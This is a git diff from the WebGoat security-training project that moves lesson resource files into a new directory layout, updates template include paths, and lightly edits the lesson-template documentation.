zsaR&SBV=ZJTACBv47x5-bU5DaPLU#yINWlL2~$jq%K}iJBQbK-r?~X`T8oR#u<`Cg
zLgvx2`^Q(&1eb%~^YaaMGg``pqUlw0>=n(;=@FQih!GOYD?<J^m!W1^f}Zv51;LL;
z_j84>qrXyUTOB3|SWTX2PEX0byu5zwCGt-L5{D{m3WEN=A7vSB-CI7cTG1Vj=jd9U
zIE7`-dL8@CHPj%Crx?)-Q3C@5dl#1?*9~TqP)oK;J0WlHTMP=}FR`hW@a%IHs^<OC
zDgyeH7hfeJTJ2`(o{G7VF%Hz|EqS~KP<!OGwKqD@X|l%n%JFxG6Rl4oV?PfL#O_pW
zz);lNSJ<8SzQA?Ej&+aYxG40(l8TDx>X7GHAD<#e!KBhJvX-z}8SQS<mBKbifNaQ{
zjBJ>i_+84#q8?C*IlZEz7K1<kjh6We->5hBe)qh$(=at|Y>^RZRD|WqIxn1}7A`Bt
zKl;{P?Yhqm2ls~apU(vtbkrxz<#V>#*#os+qxim|Z})ZDTi;ldW5h4|`7;vK;v@mV
z5BTwAa#D3!NRU&dY2`*$Wp3KL)3Ms)&eNRx4)`<Fc%Q?l(O6m+JAiL{M?{9OUNg>3
zAOYy;w9=T}*$(<)b;!-_6P+&v<%C7r4i0yh%PcG()w`4DYar7zGw>u<Cm6BPG?a;7
zmFX2K=lqKk8E|3hx+5^K^A?~&o3EOxSbnuqHfR5Bq>N!aXW$AAwkPLr;`viYrt3|4
ziA;qP84C2IWn?~H1KTr>s=GQmf{+SdZWv%U!CkB`zrAiuF6{uY5j5@%ZA1Ual>O3C
zP@t2R^uQu<>2t@nE#5)?5*<woM-Y3t+}^^JSNoMw{(YFKwbD*X{LI1OL=&YzaF9i3
zm({HDfwS5ifR&Ia<q(|o@RVRMdNAiLQnMQl29Ct%%{#>UCLMZ>`UwvSq3E0O<;omV
zBXT$12m`3MvI3(ukIWprf}uh9nO)r<#j;}0P)vsw1+oNtcEG+&PNIBX!D@5L(Q@eB
z`7Gs#Xgxc%HlH$jP-{SG+HWP_P=rT0Nkfhp`Trmp*Szf=CKEMFgfB|tos{)qi9@T=
z9#4M@O9Hd1-%$TBsN6E>Q&09UxW4<VYOM4pcA)+Bmhyc5RLP<vw5<m^xXR3X5{2!h
z2ru2P?|5PII_*$*iaK=SWf1o8TLWeJu(fXaouljN*W<v1CEiT|Gj!~4$^6t?dY4Eg
Yq|uX<`@0a>$4tN}$f!yKCC$SBFRqow2><{9

literal 0
HcmV?d00001

diff --git a/webgoat-lessons/jwt/src/main/resources/images/jerry.png b/src/main/resources/lessons/jwt/images/jerry.png
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/images/jerry.png
rename to src/main/resources/lessons/jwt/images/jerry.png
diff --git a/webgoat-lessons/jwt/src/main/resources/images/jwt_diagram.png b/src/main/resources/lessons/jwt/images/jwt_diagram.png
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/images/jwt_diagram.png
rename to src/main/resources/lessons/jwt/images/jwt_diagram.png
diff --git a/webgoat-lessons/jwt/src/main/resources/images/jwt_token.png b/src/main/resources/lessons/jwt/images/jwt_token.png
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/images/jwt_token.png
rename to src/main/resources/lessons/jwt/images/jwt_token.png
diff --git a/webgoat-lessons/jwt/src/main/resources/images/logs.txt b/src/main/resources/lessons/jwt/images/logs.txt
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/images/logs.txt
rename to src/main/resources/lessons/jwt/images/logs.txt
diff --git a/webgoat-lessons/jwt/src/main/resources/images/product-icon.png b/src/main/resources/lessons/jwt/images/product-icon.png
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/images/product-icon.png
rename to src/main/resources/lessons/jwt/images/product-icon.png
diff --git a/webgoat-lessons/jwt/src/main/resources/images/tom.png b/src/main/resources/lessons/jwt/images/tom.png
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/images/tom.png
rename to src/main/resources/lessons/jwt/images/tom.png
diff --git a/webgoat-lessons/jwt/src/main/resources/js/jwt-buy.js b/src/main/resources/lessons/jwt/js/jwt-buy.js
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/js/jwt-buy.js
rename to src/main/resources/lessons/jwt/js/jwt-buy.js
diff --git a/webgoat-lessons/jwt/src/main/resources/js/jwt-final.js b/src/main/resources/lessons/jwt/js/jwt-final.js
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/js/jwt-final.js
rename to src/main/resources/lessons/jwt/js/jwt-final.js
diff --git a/webgoat-lessons/jwt/src/main/resources/js/jwt-refresh.js b/src/main/resources/lessons/jwt/js/jwt-refresh.js
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/js/jwt-refresh.js
rename to src/main/resources/lessons/jwt/js/jwt-refresh.js
diff --git a/webgoat-lessons/jwt/src/main/resources/js/jwt-voting.js b/src/main/resources/lessons/jwt/js/jwt-voting.js
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/js/jwt-voting.js
rename to src/main/resources/lessons/jwt/js/jwt-voting.js
diff --git a/webgoat-lessons/jwt/src/main/resources/js/jwt-weak-keys.js b/src/main/resources/lessons/jwt/js/jwt-weak-keys.js
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/js/jwt-weak-keys.js
rename to src/main/resources/lessons/jwt/js/jwt-weak-keys.js
diff --git a/webgoat-lessons/jwt/src/main/resources/js/questions_jwt.json b/src/main/resources/lessons/jwt/js/questions_jwt.json
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/js/questions_jwt.json
rename to src/main/resources/lessons/jwt/js/questions_jwt.json
diff --git a/webgoat-lessons/webgoat-lesson-template/src/main/resources/db/migration/V2019_11_10_1__introduction.sql b/src/main/resources/lessons/lesson_template/db/migration/V2019_11_10_1__introduction.sql
similarity index 100%
rename from webgoat-lessons/webgoat-lesson-template/src/main/resources/db/migration/V2019_11_10_1__introduction.sql
rename to src/main/resources/lessons/lesson_template/db/migration/V2019_11_10_1__introduction.sql
diff --git a/webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-attack.adoc b/src/main/resources/lessons/lesson_template/documentation/lesson-template-attack.adoc
similarity index 76%
rename from webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-attack.adoc
rename to src/main/resources/lessons/lesson_template/documentation/lesson-template-attack.adoc
index 9cb035b1f..a1244d4f8 100644
--- a/webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-attack.adoc
+++ b/src/main/resources/lessons/lesson_template/documentation/lesson-template-attack.adoc
@@ -1,6 +1,6 @@
 === Step 4: Add an assignment to your lesson
 
-With an assignment a user can practise within a lesson. A lesson can consist of multiple assignment, each assignment
+With an assignment, a user can practice within a lesson. A lesson can consist of multiple assignments, each assignment
 needs to extend the class `AssignmentEndpoint`, let's look at an example:
 
 [source,java]
@@ -39,15 +39,17 @@ public class SampleAttack extends AssignmentEndpoint { // <3>
     }
 ----
 <1> Every assignment is just a Spring RestController
-<2> Each assignment can have a list of hints, the actual text needs to be placed in `WebGoatLabels.properties`
-<3> Each assignment needs to extend the class `AssignmentEndpoint` giving you some helpful methods you need when you want to mark an assignment as complete
-<4> As the assignment is a Spring based class you can autowire every component managed by Spring necessary for the assignment
+<2> Each assignment can have a list of hints. The actual text needs to be placed in `WebGoatLabels.properties` in the folder `src/main/resources/{lessonName}/i18n`
+<3> Each assignment needs to extend the class `AssignmentEndpoint`, giving you some helpful methods you need when you want to mark an assignment as complete
+<4> As the assignment is a Spring-based class, you can auto wire every component managed by Spring necessary for the assignment
 <5> Each assignment should at least have one mapping with the method signature (see 6)
-<6> When the user tries to solve an assignment you need return an `AttackResult`
+<6> When the user tries to solve an assignment, you need return an `AttackResult`
 <7> Returning a successful attack result when user solved the lesson
 <8> Returning a failed attack user did not solve the lesson
 
-As you can see an assignment is a REST controller which need to at least have one method with the following signature:
+{nbsp} +
+
+As you can see, an assignment is a REST controller which needs to at least have one method with the following signature:
 
 [source]
 ----
@@ -71,11 +73,11 @@ public List<Item> getItemsInBasket(@PathVariable("user") String user) {
 }
 ----
 
-=== Adding an assignment to the html page
+=== Adding an assignment to the HTML page
 
-We mentioned a lesson can consist of multiple assignments, WebGoat picks them up automatically and the UI displays
-a navigation bar on top of every lesson. A page with an assignment will be red in the beginning and will become
-green when the user solves the assignment. To make this work in the html we need to add:
+We mentioned a lesson could consist of multiple assignments, WebGoat picks them up automatically, and the UI displays
+a navigation bar on top of every lesson. A page with an assignment will be red initially and will become
+green when the user solves the assignment. To make this work we need to add to the HTML file:
 
 [source]
 ----
@@ -106,4 +108,4 @@ green when the user solves the assignment. To make this work in the html we need
 So the `action` of the form should match the method which defines the check if the lesson has been solved or not
 see `public AttackResult solved()`
 
-That's it you now successfully created your first WebGoat lesson including an assignment!
\ No newline at end of file
+That's it. You have now successfully created your first WebGoat lesson, including an assignment!
diff --git a/src/main/resources/lessons/lesson_template/documentation/lesson-template-content.adoc b/src/main/resources/lessons/lesson_template/documentation/lesson-template-content.adoc
new file mode 100644
index 000000000..660802d34
--- /dev/null
+++ b/src/main/resources/lessons/lesson_template/documentation/lesson-template-content.adoc
@@ -0,0 +1,36 @@
+== Step 1: writing content
+
+Each lesson can consist of multiple pages with content (text) to explain the vulnerability at hand. The content
+is written in AsciiDoc[https://asciidoctor.org/docs/asciidoc-writers-guide/] which makes it very easy to write content (if you know Markdown, you know AsciiDoc).
+
+You can find excellent tutorials online for the AsciiDoc syntax. We are just showing a basic overview below.
+Below we will describe some constructs often used within WebGoat.
+
+=== Sub-heading
+
+Check AsciiDoc for syntax, but more = means smaller headings. You can *bold* text and other things.
+
+=== Structuring files
+
+You should set up all content to these *.adoc files. The AsciiDoc files reside in the
+directory `/src/main/resources/{lesson}/documentation/`.
+
+=== Images
+
+Images can be referenced below, including setting style (recommended to use lesson-image as the style). The root is `/src/main/resources/{lesson}/images`
+
+image::images/firefox-proxy-config.png[Firefox Proxy Config,510,634,style="lesson-image"]
+
+=== Code block
+
+Write code blocks as follows:
+
+```
+[source]
+----
+public class A {
+
+  private String test;
+}
+----
+```
diff --git a/webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-database.adoc b/src/main/resources/lessons/lesson_template/documentation/lesson-template-database.adoc
similarity index 72%
rename from webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-database.adoc
rename to src/main/resources/lessons/lesson_template/documentation/lesson-template-database.adoc
index 996991947..cb70fa4b7 100644
--- a/webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-database.adoc
+++ b/src/main/resources/lessons/lesson_template/documentation/lesson-template-database.adoc
@@ -1,8 +1,8 @@
 === Database
 
-If the new lesson needs to store or use a database you can add a create script in the directory `{lesson}/src/main/resources/db/migration` folder.
+If the new lesson needs to store or uses a database, you can add a create script in the directory `/src/main/resources/{lesson}/db/migration` folder.
 The file name needs to follow a specific convention: `V2019_11_10_1__new-lesson.sql`, so the first part is just the current date.
-In this file you can for example create tables and insert some data, for example:
+In this file, you can for example, create tables and insert some data, for example:
 
 [source]
 ----
@@ -22,4 +22,4 @@ INSERT INTO servers VALUES ('4', 'webgoat-pre-prod', '192.168.6.4', 'EF:12:FE:34
 INSERT INTO servers VALUES ('4', 'webgoat-prd', '104.130.219.202', 'FA:91:EB:82:DC:73', 'out of order', 'Production server');
 ----
 
-Using this way to create a database will allow WebGoat to automatically reset the database to its original state.
\ No newline at end of file
+Creating a database will automatically allow WebGoat to reset the database to its original state.
diff --git a/src/main/resources/lessons/lesson_template/documentation/lesson-template-glue.adoc b/src/main/resources/lessons/lesson_template/documentation/lesson-template-glue.adoc
new file mode 100644
index 000000000..150fc3d81
--- /dev/null
+++ b/src/main/resources/lessons/lesson_template/documentation/lesson-template-glue.adoc
@@ -0,0 +1,34 @@
+=== Step 3: Write glue html page
+
+We mentioned a lesson could consist of multiple assignments, WebGoat picks them up automatically, and the UI displays
+a navigation bar on top of every lesson. A page with an assignment will be red initially and will become
+green when the user solves the assignment. To make this work we need to add:
+
+[source]
+----
+<html xmlns:th="http://www.thymeleaf.org">
+
+  <div class="lesson-page-wrapper">
+    <div class="adoc-content" th:replace="doc:lessons/lesson_template/documentation/
+lesson-template-intro.adoc"></div>
+  </div>
+  <div class="lesson-page-wrapper">
+    <div class="adoc-content" th:replace="doc:lessons/lesson_template/documentation/
+lesson-template-content.adoc"></div>
+  </div>
+  <div class="lesson-page-wrapper">
+    <div class="adoc-content" th:replace="doc:lessons/lesson_template/documentation/
+lesson-template-lesson-class.adoc"></div>
+  </div>
+</html>
+----
+
+This file needs to be places in: `/src/main/resources/{lesson}/html/`. The name of the file should be the same as
+the Java class we created in step 2.
+
+The snippet above will create three separate pages (navigation bar) with the adoc pages we created to create this lesson.
+
+That's it we create a basic lesson with only content. To make it all work, you need to make the lesson available in
+WebGoat.
+
+That's it. Start WebGoat, and your lesson will appear in the menu.
diff --git a/webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-intro.adoc b/src/main/resources/lessons/lesson_template/documentation/lesson-template-intro.adoc
similarity index 50%
rename from webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-intro.adoc
rename to src/main/resources/lessons/lesson_template/documentation/lesson-template-intro.adoc
index 441ce0aaa..422705a5a 100644
--- a/webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-intro.adoc
+++ b/src/main/resources/lessons/lesson_template/documentation/lesson-template-intro.adoc
@@ -1,8 +1,8 @@
-This lesson describes the steps needed to add a new lesson to WebGoat. In general there are four steps:
+This lesson describes the steps needed to add a new lesson to WebGoat. In general, there are four steps:
 
-- Write the content, in WebGoat we use AsciiDoc as a format.
+- Write the content. In WebGoat, we use AsciiDoc as a format.
 - Create a lesson class
-- Write html glue page so WebGoat knows how the content should be displayed
+- Write HTML glue page, so WebGoat knows how to display the content
 - Add one or more assignments within the lesson
 
 Let's see how to create a new lesson.
diff --git a/webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-lesson-class.adoc b/src/main/resources/lessons/lesson_template/documentation/lesson-template-lesson-class.adoc
similarity index 65%
rename from webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-lesson-class.adoc
rename to src/main/resources/lessons/lesson_template/documentation/lesson-template-lesson-class.adoc
index 178b6b138..3ee6d8395 100644
--- a/webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-lesson-class.adoc
+++ b/src/main/resources/lessons/lesson_template/documentation/lesson-template-lesson-class.adoc
@@ -1,6 +1,6 @@
 === Step 2: adding a new lesson class
 
-Each lesson can contain multiple assignments, first let's define a lesson class in Java
+Each lesson can contain multiple assignments, first. Let's define a lesson class in Java:
 
 [source]
 ----
@@ -18,3 +18,4 @@ public class LessonTemplate extends Lesson {
 }
 ----
 
+Add the new lesson to a new package under `org.owasp.webgoat.lessons`.
diff --git a/webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-video-more.adoc b/src/main/resources/lessons/lesson_template/documentation/lesson-template-video-more.adoc
similarity index 100%
rename from webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-video-more.adoc
rename to src/main/resources/lessons/lesson_template/documentation/lesson-template-video-more.adoc
diff --git a/webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-video.adoc b/src/main/resources/lessons/lesson_template/documentation/lesson-template-video.adoc
similarity index 82%
rename from webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-video.adoc
rename to src/main/resources/lessons/lesson_template/documentation/lesson-template-video.adoc
index 83831886f..105527d5a 100644
--- a/webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-video.adoc
+++ b/src/main/resources/lessons/lesson_template/documentation/lesson-template-video.adoc
@@ -1,7 +1,7 @@
 === More Content, Video too ...
 
-You can structure and format the content however you like. You can even include video if you like (but may be subject to browser support). You may want to make it more pertinent to web application security than this though.
+You can structure and format the content however you like. You can even include video if you like (but may be subject to browser support). You may want to make it more pertinent to web application security than this, though.
 
 video::video/sample-video.m4v[width=480,start=5]
 
-see http://asciidoctor.org/docs/asciidoc-syntax-quick-reference/#videos for more detail on video syntax
\ No newline at end of file
+see http://asciidoctor.org/docs/asciidoc-syntax-quick-reference/#videos for more detail on video syntax
diff --git a/webgoat-lessons/webgoat-lesson-template/src/main/resources/html/LessonTemplate.html b/src/main/resources/lessons/lesson_template/html/LessonTemplate.html
similarity index 79%
rename from webgoat-lessons/webgoat-lesson-template/src/main/resources/html/LessonTemplate.html
rename to src/main/resources/lessons/lesson_template/html/LessonTemplate.html
index 1444a8454..730b2e37b 100644
--- a/webgoat-lessons/webgoat-lesson-template/src/main/resources/html/LessonTemplate.html
+++ b/src/main/resources/lessons/lesson_template/html/LessonTemplate.html
@@ -4,38 +4,38 @@
         <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
         <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
         which go in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-        <div class="adoc-content" th:replace="doc:lesson-template-intro.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/lesson_template/documentation/lesson-template-intro.adoc"></div>
     </div>
 
     <div class="lesson-page-wrapper">
         <!-- reuse the above lesson-page-wrapper block for each 'page' of content in your lesson -->
         <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
         which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-        <div class="adoc-content" th:replace="doc:lesson-template-content.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/lesson_template/documentation/lesson-template-content.adoc"></div>
     </div>
 
     <div class="lesson-page-wrapper">
         <!-- reuse the above lesson-page-wrapper block for each 'page' of content in your lesson -->
         <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
         which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-        <div class="adoc-content" th:replace="doc:lesson-template-video.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/lesson_template/documentation/lesson-template-video.adoc"></div>
         <!-- can use multiple adoc's in a page-wrapper if you want ... or not-->
-        <div class="adoc-content" th:replace="doc:lesson-template-video-more.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/lesson_template/documentation/lesson-template-video-more.adoc"></div>
     </div>
 
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lesson-template-lesson-class.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/lesson_template/documentation/lesson-template-lesson-class.adoc"></div>
     </div>
 
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lesson-template-glue.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/lesson_template/documentation/lesson-template-glue.adoc"></div>
     </div>
 
     <div class="lesson-page-wrapper">
         <!-- reuse the above lesson-page-wrapper block for each 'page' of content in your lesson -->
         <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
         which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-        <div class="adoc-content" th:replace="doc:lesson-template-attack.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/lesson_template/documentation/lesson-template-attack.adoc"></div>
 
         <!-- WebGoat will automatically style and scaffold some functionality by using the div.attack-container as below -->
         <div class="attack-container">
@@ -71,7 +71,7 @@
         see other lessons for other more complex examples -->
 
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lesson-template-database.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/lesson_template/documentation/lesson-template-database.adoc"></div>
     </div>
 
 </html>
diff --git a/webgoat-lessons/webgoat-lesson-template/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/lesson_template/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/webgoat-lesson-template/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/lesson_template/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/webgoat-lesson-template/src/main/resources/images/firefox-proxy-config.png b/src/main/resources/lessons/lesson_template/images/firefox-proxy-config.png
similarity index 100%
rename from webgoat-lessons/webgoat-lesson-template/src/main/resources/images/firefox-proxy-config.png
rename to src/main/resources/lessons/lesson_template/images/firefox-proxy-config.png
diff --git a/webgoat-lessons/webgoat-lesson-template/src/main/resources/js/idor.js b/src/main/resources/lessons/lesson_template/js/idor.js
similarity index 100%
rename from webgoat-lessons/webgoat-lesson-template/src/main/resources/js/idor.js
rename to src/main/resources/lessons/lesson_template/js/idor.js
diff --git a/webgoat-lessons/webgoat-lesson-template/src/main/resources/video/sample-video.m4v b/src/main/resources/lessons/lesson_template/video/sample-video.m4v
similarity index 100%
rename from webgoat-lessons/webgoat-lesson-template/src/main/resources/video/sample-video.m4v
rename to src/main/resources/lessons/lesson_template/video/sample-video.m4v
diff --git a/webgoat-lessons/logging/src/main/resources/lessonPlans/en/logReading_Task.adoc b/src/main/resources/lessons/logging/documentation/logReading_Task.adoc
similarity index 100%
rename from webgoat-lessons/logging/src/main/resources/lessonPlans/en/logReading_Task.adoc
rename to src/main/resources/lessons/logging/documentation/logReading_Task.adoc
diff --git a/webgoat-lessons/logging/src/main/resources/lessonPlans/en/logSpoofing_Task.adoc b/src/main/resources/lessons/logging/documentation/logSpoofing_Task.adoc
similarity index 100%
rename from webgoat-lessons/logging/src/main/resources/lessonPlans/en/logSpoofing_Task.adoc
rename to src/main/resources/lessons/logging/documentation/logSpoofing_Task.adoc
diff --git a/webgoat-lessons/logging/src/main/resources/lessonPlans/en/logging_intro.adoc b/src/main/resources/lessons/logging/documentation/logging_intro.adoc
similarity index 100%
rename from webgoat-lessons/logging/src/main/resources/lessonPlans/en/logging_intro.adoc
rename to src/main/resources/lessons/logging/documentation/logging_intro.adoc
diff --git a/webgoat-lessons/logging/src/main/resources/lessonPlans/en/more_logging.adoc b/src/main/resources/lessons/logging/documentation/more_logging.adoc
similarity index 100%
rename from webgoat-lessons/logging/src/main/resources/lessonPlans/en/more_logging.adoc
rename to src/main/resources/lessons/logging/documentation/more_logging.adoc
diff --git a/webgoat-lessons/logging/src/main/resources/lessonPlans/en/sensitive_logging_intro.adoc b/src/main/resources/lessons/logging/documentation/sensitive_logging_intro.adoc
similarity index 100%
rename from webgoat-lessons/logging/src/main/resources/lessonPlans/en/sensitive_logging_intro.adoc
rename to src/main/resources/lessons/logging/documentation/sensitive_logging_intro.adoc
diff --git a/webgoat-lessons/logging/src/main/resources/html/LogSpoofing.html b/src/main/resources/lessons/logging/html/LogSpoofing.html
similarity index 79%
rename from webgoat-lessons/logging/src/main/resources/html/LogSpoofing.html
rename to src/main/resources/lessons/logging/html/LogSpoofing.html
index 50907ad78..68e49a064 100755
--- a/webgoat-lessons/logging/src/main/resources/html/LogSpoofing.html
+++ b/src/main/resources/lessons/logging/html/LogSpoofing.html
@@ -6,12 +6,12 @@
     <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
     <!-- include content here. Content will be presented via asciidocs files,
     which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-    <div class="adoc-content" th:replace="doc:logging_intro.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/logging/documentation/logging_intro.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
     <!-- stripped down without extra comments -->
-    <div class="adoc-content" th:replace="doc:logSpoofing_Task.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/logging/documentation/logSpoofing_Task.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN" name="task"
@@ -30,10 +30,10 @@
     </div>
 </div>
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:sensitive_logging_intro.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/logging/documentation/sensitive_logging_intro.adoc"></div>
 </div>
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:logReading_Task.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/logging/documentation/logReading_Task.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN" name="task"
@@ -50,6 +50,6 @@
     </div>
 </div>
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:more_logging.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/logging/documentation/more_logging.adoc"></div>
 </div>
 </html>
diff --git a/webgoat-lessons/logging/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/logging/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/logging/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/logging/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/missing-function-ac/src/main/resources/css/ac.css b/src/main/resources/lessons/missing_ac/css/ac.css
similarity index 100%
rename from webgoat-lessons/missing-function-ac/src/main/resources/css/ac.css
rename to src/main/resources/lessons/missing_ac/css/ac.css
diff --git a/webgoat-lessons/missing-function-ac/src/main/resources/db/migration/V2021_11_03_1__ac.sql b/src/main/resources/lessons/missing_ac/db/migration/V2021_11_03_1__ac.sql
similarity index 100%
rename from webgoat-lessons/missing-function-ac/src/main/resources/db/migration/V2021_11_03_1__ac.sql
rename to src/main/resources/lessons/missing_ac/db/migration/V2021_11_03_1__ac.sql
diff --git a/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-01-intro.adoc b/src/main/resources/lessons/missing_ac/documentation/missing-function-ac-01-intro.adoc
similarity index 100%
rename from webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-01-intro.adoc
rename to src/main/resources/lessons/missing_ac/documentation/missing-function-ac-01-intro.adoc
diff --git a/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-02-client-controls.adoc b/src/main/resources/lessons/missing_ac/documentation/missing-function-ac-02-client-controls.adoc
similarity index 100%
rename from webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-02-client-controls.adoc
rename to src/main/resources/lessons/missing_ac/documentation/missing-function-ac-02-client-controls.adoc
diff --git a/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-03-users.adoc b/src/main/resources/lessons/missing_ac/documentation/missing-function-ac-03-users.adoc
similarity index 100%
rename from webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-03-users.adoc
rename to src/main/resources/lessons/missing_ac/documentation/missing-function-ac-03-users.adoc
diff --git a/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-04-users-fixed.adoc b/src/main/resources/lessons/missing_ac/documentation/missing-function-ac-04-users-fixed.adoc
similarity index 100%
rename from webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-04-users-fixed.adoc
rename to src/main/resources/lessons/missing_ac/documentation/missing-function-ac-04-users-fixed.adoc
diff --git a/webgoat-lessons/missing-function-ac/src/main/resources/html/MissingFunctionAC.html b/src/main/resources/lessons/missing_ac/html/MissingFunctionAC.html
similarity index 89%
rename from webgoat-lessons/missing-function-ac/src/main/resources/html/MissingFunctionAC.html
rename to src/main/resources/lessons/missing_ac/html/MissingFunctionAC.html
index 49c42e774..daf5b8fd6 100644
--- a/webgoat-lessons/missing-function-ac/src/main/resources/html/MissingFunctionAC.html
+++ b/src/main/resources/lessons/missing_ac/html/MissingFunctionAC.html
@@ -1,12 +1,12 @@
 <html xmlns:th="http://www.thymeleaf.org">
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:missing-function-ac-01-intro.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/missing_ac/documentation/missing-function-ac-01-intro.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
     <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/ac.css}"/>
-    <div class="adoc-content" th:replace="doc:missing-function-ac-02-client-controls.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/missing_ac/documentation/missing-function-ac-02-client-controls.adoc"></div>
 
     <div class="attack-container">
         <nav class="navbar navbar-default">
@@ -70,7 +70,7 @@
 
 <div class="lesson-page-wrapper">
 
-    <div class="adoc-content" th:replace="doc:missing-function-ac-03-users.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/missing_ac/documentation/missing-function-ac-03-users.adoc"></div>
 
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
@@ -92,7 +92,7 @@
 
 <div class="lesson-page-wrapper">
 
-    <div class="adoc-content" th:replace="doc:missing-function-ac-04-users-fixed.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/missing_ac/documentation/missing-function-ac-04-users-fixed.adoc"></div>
 
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
diff --git a/webgoat-lessons/missing-function-ac/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/missing_ac/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/missing-function-ac/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/missing_ac/i18n/WebGoatLabels.properties
